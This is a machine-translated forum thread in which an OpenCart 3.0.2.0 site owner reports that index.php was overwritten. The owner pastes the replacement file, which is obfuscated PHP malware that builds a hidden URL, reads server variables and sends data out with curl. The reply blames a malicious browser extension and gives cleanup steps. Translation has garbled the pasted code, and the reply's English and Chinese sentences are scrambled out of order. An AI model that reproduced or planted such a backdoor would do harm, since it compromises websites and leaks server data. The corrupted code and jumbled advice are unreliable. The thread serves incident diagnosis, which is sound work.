Opencart index.php 檔案損壞
P粉545956597
2023-08-30 12:23:26
<p>我使用的是opencart v3.0.2.0,問題是opencart的index.php檔案(我的opencart網站的入口點,上傳到public_html目錄)崩潰了(index.php檔案中的程式碼發生了變化到奇怪的字元)。
上週發生了兩次這種情況。我不知道有人遭到駭客攻擊或我的網域或代碼出現問題。
如果有人可以幫助或指導我,請告訴我。
謝謝。 </p>
<p>損壞後的index.php檔:</p>
<p>全域$O; $O=url解碼($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$奧[63].$奧[63].$奧[64].$奧[72].$奧[66].$奧[59].$奧[65]. $奧[67].$奧[ 71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];函數ooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $OOOOOooOo=curl_init();curl_setopt($OOooooOooOo,CUROOoo curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $OOOOooO =curl_exec( $OOOooOo);OOcurl = array()){ 全域$O;$OooooO=str_replace(' ',' ',$OooooO);$OOO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooLOO");curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOOOO,CURRANPT , 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooooO,CURLOPT_TIMEOUT,10);curl_setopt($OOOOO,CURLOPT_POST, 1);curl_setopt($O. $OOOOoo ));$OOOOooo=curl_exec($OOooooO);$OOOOoooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOoooOO){回傳false ;}回傳$OOOOooo ;} 函式ooOOo){全域$O;$ooOOOOo = false;$oooooOOo = $O[14].$O[8].$O[8].$O[14]. $O[18].$O[2] .$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14].$ O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O[ 90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10]. $O[8] .$O[18] ;if ($ooOOo!=''){if (preg_match("/($oooooOOo)/si",$ooOOo)){$ooOOOOo=true;}}回傳$ ooOOOOo;} 函數oooOOooOOoOO ($oOOOOOOoOOOO){全域全域$O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[ 59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90]. $O[5].$O[10] .$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16].$ O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[ 59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO= true;}回傳$ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$O [13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O[ 63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63]. $O[63] );$oOoooOOoOO=$ _SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$ O[30]。$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOooooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63]$O[7]. $O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O [ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15 ] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59]. $ $O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$ O[ 12].$O [11].$O</p>
I recently encountered a similar issue with one of my clients. Upon investigation, we found that the problem was caused by a Chrome browser extension that injects code into
1- 截取瀏覽器中用於將檔案上傳到伺服器的所有擴充功能的螢幕截圖,與我們共用,然後刪除瀏覽器或其所有擴充功能。PHP# filefiles when# loadfiles ## files through the browser (like Cpanel File Management). In this case, the code was injected into theindex.phpfile, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using thecURLfunction inPHP.要解決此問題,您可以採取以下步驟:
2- 檢查自駭客事件發生之日起上傳或更新至伺服器的所有檔案。您可以在伺服器上執行命令以取得新檔案或更新檔案的列表,具體取決於您的作業系統。
3- You may find some*.php
files in the.well-known
您能否分享您的瀏覽器擴充功能的螢幕截圖,以便我們確定哪個擴充功能可能導致網站遭到駭客攻擊?or other hidden folders on the server.4- 使用防毒軟體保護您的作業系統。我建議使用非免費防毒軟體,例如卡巴斯基。